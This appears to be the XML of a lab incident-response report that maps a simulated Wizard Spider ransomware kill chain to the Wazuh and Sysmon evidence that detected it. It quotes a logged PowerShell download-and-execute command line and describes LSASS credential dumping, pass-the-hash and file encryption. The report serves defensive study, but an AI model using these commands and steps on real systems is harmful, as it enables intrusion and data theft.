          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2802"/>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="3971"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2802"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Preparation Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279"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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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Verification Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3971"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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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All Wazuh agents Active (DC01, FS01, WS-EMP01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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Dashboard: Agent Status panel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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ATTACK01 deliberately excluded from monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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Sysmon v15 running on all Windows VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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services.msc / Get-Service Sysmon64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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SwiftOnSecurity config applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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FIM configured on C:\Shares — all 4 department shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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ossec.conf syscheck block reviewed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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realtime=yes, check_all=yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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Security + Microsoft-Windows-Sysmon channels in ossec.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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event log review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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eventchannel format verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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Pre-attack alert baseline captured (30-min clean collection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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Discover — timestamp filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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Used for anomaly comparison post-attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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VM snapshots taken on all machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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VMware Snapshot Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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Restore point confirmed before simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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admin credentials stored offline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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Password stored in encrypted offline vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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Not stored on any lab VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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Attack scope agreement signed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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DEPI programme documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="397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Targets: WS-EMP01, FS01, DC01 in spider.local only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc29491"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>IDENTIFICATION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Determine with confidence that a security incident is underway. Collect sufficient evidence from Sysmon, Windows Event, and Wazuh FIM logs to establish a complete attack timeline before any containment action is taken.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1  Attack Simulation — Kill Chain Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The simulation faithfully replicates each documented Wizard Spider TTP. The table below maps each kill-chain phase to its MITRE technique, execution timestamp (relative to T0), the action taken on the target, and the detection signal observed in Wazuh.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10524" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="508"/>
        <w:gridCol w:w="1054"/>
        <w:gridCol w:w="717"/>
        <w:gridCol w:w="1248"/>
        <w:gridCol w:w="2892"/>
        <w:gridCol w:w="4105"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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Ph.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717"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 (min)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Kill Chain Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2892"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Action Executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4105"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Detection Signal in Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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T+0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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Atomic Red Team T1204.002: maldoc macro spawns cmd.exe → PowerShell → downloads Sliver beacon. Sysmon captures full process ancestry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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EID 1 (proc create): WINWORD.EXE → cmd.exe → powershell.exe chain; EID 3 (network): outbound to ATTACK01:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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T+15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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Scheduled task 'WindowsUpdateHelper' created via schtasks.exe running under WS-EMP01\Administrator context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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Windows EID 4698 (task created): task name, action path, and user context logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T+30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>C2 Beaconing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Sliver HTTP beacon checks in every 30 seconds from WS-EMP01 to ATTACK01. Traffic pattern deviates from baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Sysmon EID 3: periodic outbound — same process, same destination, 30s interval — no prior baseline record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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T+60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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Kiwi/Mimikatz creds_all executed via Sliver session: LSASS memory accessed; NTLM hash for domain admin extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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Sysmon EID 10 (proc access): TargetImage = lsass.exe; GrantedAccess = 0x1010; Custom Rule 100010 → Level 15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1021.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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T+90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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Pass-the-Hash via CrackMapExec using stolen domain admin NTLM hash; WinRM sessions to FS01 and DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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Windows EID 4624 on FS01 and DC01: Logon Type 3 (network), AuthPackage: NTLM, Source IP: 10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1074.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717"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T+120</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Data Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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Evil-WinRM shell on FS01: all 4 SMB shares (Finance, Radiology, Appointments, ITSupport) copied to C:\Windows\Temp\stage; archive created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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FIM: 50+ file access alerts within 60s; all 4 shares triggered simultaneously — no single-user baseline match</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="508"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717"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T+150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Ransomware Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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PowerShell ransomware simulation: 30 files in C:\RansomSimLab encrypted → .CONTI extension; HOW_TO_DECRYPT.txt dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="410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FIM burst: 20+ modification events in &lt;30s; extension change detected; Custom Rule 100020 → Level 15 CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>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2.2  Wazuh Detection Evidence — Phase by Phase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 1 — Initial Access  (T1204.002)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Atomic Red Team technique T1204.002 executed on WS-EMP01, simulating a user opening a malicious Office document. Wazuh captured a process-creation chain originating from WINWORD.EXE (parent PID 4016) spawning cmd.exe, which in turn executed PowerShell with a heavily obfuscated one-liner. The PowerShell command — visible in its entirety in Wazuh's eventdata.commandLine field — contacted raw.githubusercontent.com to pull the Atomic Red Team macro payload, then launched a JavaScript helper script (art.jse) via cscript.exe. This parent-child relationship (Office application → scripting host) is a textbook initial access indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Wazuh fields observed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:hanging="240" w:start="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">data.win.eventdata.parentImage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE</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data.win.eventdata.commandLine: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>powershell.exe &amp; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr 'https://raw.githubusercontent.com/...T1204.002/src/Invoke-MalDoc.ps1' -UseBasicParsing)...</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data.win.eventdata.image: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>C:\Windows\SysWOW64\cscript.exe  (launched art.jse — OSTap payload download)</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Wazuh Index: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wazuh-alerts-4.x-2026.05.08 | Agent: EMP01 | Event count: 49 process creation events in 24hr window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>*screen from wazuh alert (event )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
